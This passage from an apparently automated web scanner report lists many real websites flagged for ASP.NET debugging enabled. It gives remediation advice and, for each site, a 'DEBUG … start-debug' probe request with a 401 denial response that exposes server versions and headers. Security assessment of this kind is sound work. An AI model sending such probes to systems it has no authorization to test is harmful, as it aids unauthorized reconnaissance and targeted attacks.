http://www.threatexpert.com/Default.aspx
http://www.tmkrms.com/Default.aspx
http://www.totalinjury.com/Default.aspx
http://www.totallymoney.com/Default.aspx
http://www.trackinhalant.com/Default.aspx
http://www.tracklilliputian.com/Default.aspx
http://www.trackphial.com/Default.aspx
http://www.trackzz.com/Default.aspx
http://www.trade-schools.net/Default.aspx
http://www.ureader.de/Default.aspx
http://www.vanceandhines.com/Default.aspx
http://www.videogamecareers.com/Default.aspx
http://www.voa.org/Default.aspx
http://www.westathome.com/Default.aspx
http://www.wnyjobs.com/Default.aspx

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

16.1. http://www.aaaorid.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.aaaorid.com
Path:	/Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.aaaorid.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:39:04 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.2. http://www.adftrack.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.adftrack.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.adftrack.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: keep-alive
Date: Tue, 03 May 2011 11:03:47 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: LinkTrust
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.3. http://www.algebralab.org/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.algebralab.org
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.algebralab.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:42:31 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.4. http://www.baen.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.baen.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.baen.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:24:38 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.5. http://www.baskinghill.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.baskinghill.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.baskinghill.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:46:25 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.6. http://www.bhgrealestate.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bhgrealestate.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.bhgrealestate.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:21:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Set-Cookie: BIGipServervip_64.37.197.236_http=3442093834.20480.0000; path=/

Debug access denied to '/Default.aspx'.

16.7. http://www.bookmaker.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.bookmaker.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.bookmaker.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Server: nginx
Date: Tue, 03 May 2011 11:42:47 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Cache-Control: private
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.8. http://www.brightonfnl.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.brightonfnl.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.brightonfnl.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:39:35 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.9. http://www.classicsonline.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.classicsonline.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.classicsonline.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:54:44 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.10. http://www.coloniallife.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.coloniallife.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.coloniallife.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Connection: close
Date: Tue, 03 May 2011 10:36:35 GMT
Content-Length: 39
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BlueStripe.PVN=4c4000052c4; path=/
X-AspNet-Version: 2.0.50727

Debug access denied to '/Default.aspx'.

16.11. http://www.coxenterprises.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.coxenterprises.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.coxenterprises.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:57:34 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.12. http://www.creditacceptance.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.creditacceptance.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.creditacceptance.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:21:59 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Set-Cookie: BIGipServerwwwCApool80=358900746.20480.0000; path=/

Debug access denied to '/Default.aspx'.

16.13. http://www.cupsultana.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cupsultana.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.cupsultana.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:49:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.14. http://www.elpasoco.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.elpasoco.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.elpasoco.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:41:53 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.15. http://www.embark.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.embark.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.embark.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:25:12 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6315
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.16. http://www.endlessvacation.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.endlessvacation.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.endlessvacation.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:20:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.17. http://www.esc4.net/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.esc4.net
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.esc4.net
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:08:21 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.18. http://www.firstresponse.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.firstresponse.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.firstresponse.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:47:05 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.19. http://www.freecampgrounds.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.freecampgrounds.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.freecampgrounds.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:07:31 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.20. http://www.freeltcquotes.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.freeltcquotes.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.freeltcquotes.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:53:20 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.21. http://www.freightlinertrucks.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.freightlinertrucks.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.freightlinertrucks.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:36:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Set-Cookie: BIGipServerFreightliner=2634285738.20480.0000; path=/

Debug access denied to '/Default.aspx'.

16.22. http://www.geniecompany.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.geniecompany.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.geniecompany.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:12:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.23. http://www.goldenlivingcenters.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.goldenlivingcenters.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.goldenlivingcenters.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:40:20 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.24. http://www.gottashopdeals.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.gottashopdeals.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.gottashopdeals.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:21:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.25. http://www.govcourtregistry.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.govcourtregistry.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.govcourtregistry.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:29:34 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.26. http://www.justgiving.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.justgiving.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.justgiving.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:29:57 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
server: 192.168.110.247
X-Powered-By: ASP.NET
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.27. http://www.kiwikp.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kiwikp.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.kiwikp.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:26:57 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="IIS - hopwalrus.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.28. http://www.kohlerplus.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.kohlerplus.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.kohlerplus.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:48:09 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.29. http://www.landsharklager.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.landsharklager.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.landsharklager.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:48:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.30. http://www.lunchprepay.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lunchprepay.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.lunchprepay.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:45:48 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.31. http://www.marioncountyfl.org/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.marioncountyfl.org
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.marioncountyfl.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Content-Length: 39
Date: Tue, 03 May 2011 11:19:51 GMT
Content-Type: text/html; charset=utf-8
Server: Apache-Coyote/1.1
cache-control: no-cache
Cache-Control: private
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By:Servlet/2.4

Debug access denied to '/Default.aspx'.

16.32. http://www.maxwebsavings.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.maxwebsavings.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.maxwebsavings.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:54:31 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.33. http://www.moneymailer.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.moneymailer.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.moneymailer.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:53:34 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.34. http://www.moveforfree.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.moveforfree.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.moveforfree.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:04:55 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.35. http://www.nccde.org/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.nccde.org
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.nccde.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:15:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.36. http://www.neatco.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.neatco.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.neatco.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:28:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.37. http://www.needlepointers.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.needlepointers.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.needlepointers.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:19:43 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Basic realm="www.needlepointers.com"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.38. http://www.netfit.co.uk/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.netfit.co.uk
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.netfit.co.uk
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:27:35 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.39. http://www.outsideinfo.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.outsideinfo.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.outsideinfo.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:45:13 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.40. http://www.pgcc.edu/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pgcc.edu
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pgcc.edu
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:58:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.41. http://www.picnet.com.au/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.picnet.com.au
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.picnet.com.au
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:18:12 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.42. http://www.pnf.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pnf.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pnf.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:25:03 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.43. http://www.pnwboces.org/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pnwboces.org
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.pnwboces.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:09:38 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.44. http://www.polarispartshouse.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.polarispartshouse.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.polarispartshouse.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:14:48 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.45. http://www.primos.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.primos.com
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.primos.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 10:40:41 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

16.46. http://www.psoriasis.org/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.psoriasis.org
Path:	/Default.aspx

Issue detail

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.psoriasis.org
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 03 May 2011 11:22:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
